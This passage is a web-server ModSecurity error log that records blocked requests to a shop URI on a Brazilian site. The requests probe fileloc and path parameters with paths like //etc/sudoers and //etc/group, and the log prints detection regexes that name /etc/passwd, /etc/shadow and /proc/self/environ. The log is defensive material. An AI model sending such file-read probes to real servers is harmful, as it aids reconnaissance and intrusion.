"/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIgbLMZ6AikZjR9WG3gAAAAg"]
[Thu Mar 19 18:56:50.905407 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.37:54656] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/networks"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIsdf6f5d65gmYZSkyQAAAtU"]
[Thu Mar 19 18:56:51.425975 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.36:54658] [client 57.141.18.36] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc2.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIxCii7xarUs8iHYWXQAAAgM"]
[Thu Mar 19 18:56:51.940808 2026] [:error] [pid 7893:tid 140411716749056] [client 57.141.18.50:54672] [client 57.141.18.50] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxIxCii7xarUs8iHYWYAAAAgM"]
[Thu Mar 19 18:56:53.483092 2026] [:error] [pid 7545:tid 140411641214720] [client 57.141.18.13:54706] [client 57.141.18.13] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subgid"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxJX8B84UptSoTJtY53AAAAYw"]
[Thu Mar 19 18:56:54.027506 2026] [:error] [pid 27293:tid 140411733534464] [client 57.141.18.83:54718] [client 57.141.18.83] ModSecurity: Access denied with code 403 (phase 1). Pattern match "(?:/etc/passwd|/etc/shadow|/proc/self/environ|uname -a|uname -r)" at REQUEST_LINE. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_12_KnowAttacks.conf"] [line "5"] [id "99000"] [msg "Locaweb Custom Rules - Command execution attack"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxJv-YZRR_7pZ7nDK2LAAAA8E"]
[Thu Mar 19 18:56:55.819833 2026] [:error] [pid 14269:tid 140411674785536] [client 57.141.18.7:54744] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxJwbLMZ6AikZjR9WG4AAAAAg"]
[Thu Mar 19 18:56:55.819868 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.118:54734] [client 57.141.18.118] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxJk1ujooLWdUDGy4AAAAAAFM"]
[Thu Mar 19 18:56:55.822122 2026] [:error] [pid 17653:tid 140411674785536] [client 57.141.18.59:54742] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxJ8df6f5d65gmYZSkywAAAsg"]
[Thu Mar 19 18:56:55.822122 2026] [:error] [pid 7545:tid 140411741927168] [client 57.141.18.24:54750] [client 57.141.18.24] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxJ38B84UptSoTJtY53QAAAYA"]
[Thu Mar 19 18:56:56.336449 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.111:54760] [client 57.141.18.111] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxKAkwaGbbGflqUZD2qQAAAME"]
[Thu Mar 19 18:56:57.288793 2026] [:error] [pid 21219:tid 140411725141760] [client 57.141.18.16:54780] [client 57.141.18.16] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dovecot.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxKfXLqtnMIWvjpaJJlwAAAoI"]
[Thu Mar 19 18:56:57.927195 2026] [:error] [pid 30077:tid 140411574073088] [client 57.141.18.48:54794] [client 57.141.18.48] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sudoers"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxKfu8EFLIOrSqIpvTbAAAAlQ"]
[Thu Mar 19 18:56:58.647699 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.78:54806] [client 57.141.18.78] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxKvXLqtnMIWvjpaJJmAAAAo8"]
[Thu Mar 19 18:56:58.706603 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.59:54808] [client 57.141.18.59] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxKgkwaGbbGflqUZD2qgAAAME"]
[Thu Mar 19 18:57:00.387000 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.80:54810] [client 57.141.18.80] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rsyncd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxKvXLqtnMIWvjpaJJmQAAAoQ"]
[Thu Mar 19 18:57:00.387080 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.70:54816] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/man_db.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxK8df6f5d65gmYZSkzQAAAtU"]
[Thu Mar 19 18:57:00.388228 2026] [:error] [pid 7545:tid 140411607643904] [client 57.141.18.104:54814] [client 57.141.18.104] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxK38B84UptSoTJtY53gAAAZA"]
[Thu Mar 19 18:57:00.390543 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.103:54820] [client 57.141.18.103] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxK01ujooLWdUDGy4AAQAAAFM"]
[Thu Mar 19 18:57:01.304494 2026] [:error] [pid 30077:tid 140411733534464] [client 57.141.18.124:54848] [client 57.141.18.124] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxLfu8EFLIOrSqIpvTbgAAAkE"]
[Thu Mar 19 18:57:01.752264 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.97:54854] [client 57.141.18.97] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxLfXLqtnMIWvjpaJJmgAAAog"]
[Thu Mar 19 18:57:02.527691 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.30:54874] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxLk1ujooLWdUDGy4AAgAAAFM"]
[Thu Mar 19 18:57:03.195731 2026] [:error] [pid 7235:tid 140411683178240] [client 57.141.18.15:54888] [client 57.141.18.15] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/pool.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxL_qxLDW4GITHUkSTJQAAAQc"]
[Thu Mar 19 18:57:03.280933 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.21:54892] [client 57.141.18.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxL9a6ubjKNq_cu4Z__AAAA08"]
[Thu Mar 19 18:57:03.644311 2026] [:error] [pid 8307:tid 140411699963648] [client 57.141.18.54:54896] [client 57.141.18.54] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/logrotate.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxL7-FhjpZGs9ba8qV_gAAAwU"]
[Thu Mar 19 18:57:04.169595 2026] [:error] [pid 26799:tid 140411741927168] [client 57.141.18.1:54902] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxMNa6ubjKNq_cu4Z__QAAA0A"]
[Thu Mar 19 18:57:04.980119 2026] [:error] [pid 26799:tid 140411733534464] [client 57.141.18.9:54922] [client 57.141.18.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/freetds.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxMNa6ubjKNq_cu4aAAQAAA0E"]
[Thu Mar 19 18:57:05.425016 2026] [:error] [pid 26799:tid 140411641214720] [client 57.141.18.57:54928] [client 57.141.18.57] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxMda6ubjKNq_cu4aAAwAAA0w"]
[Thu Mar 19 18:57:06.017861 2026] [:error] [pid 7235:tid 140411557287680] [client 57.141.18.113:54936] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxMvqxLDW4GITHUkSTJgAAARY"]
[Thu Mar 19 18:57:06.517512 2026] [:error] [pid 26799:tid 140411616036608] [client 57.141.18.7:54918] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxMta6ubjKNq_cu4aABgAAA08"]
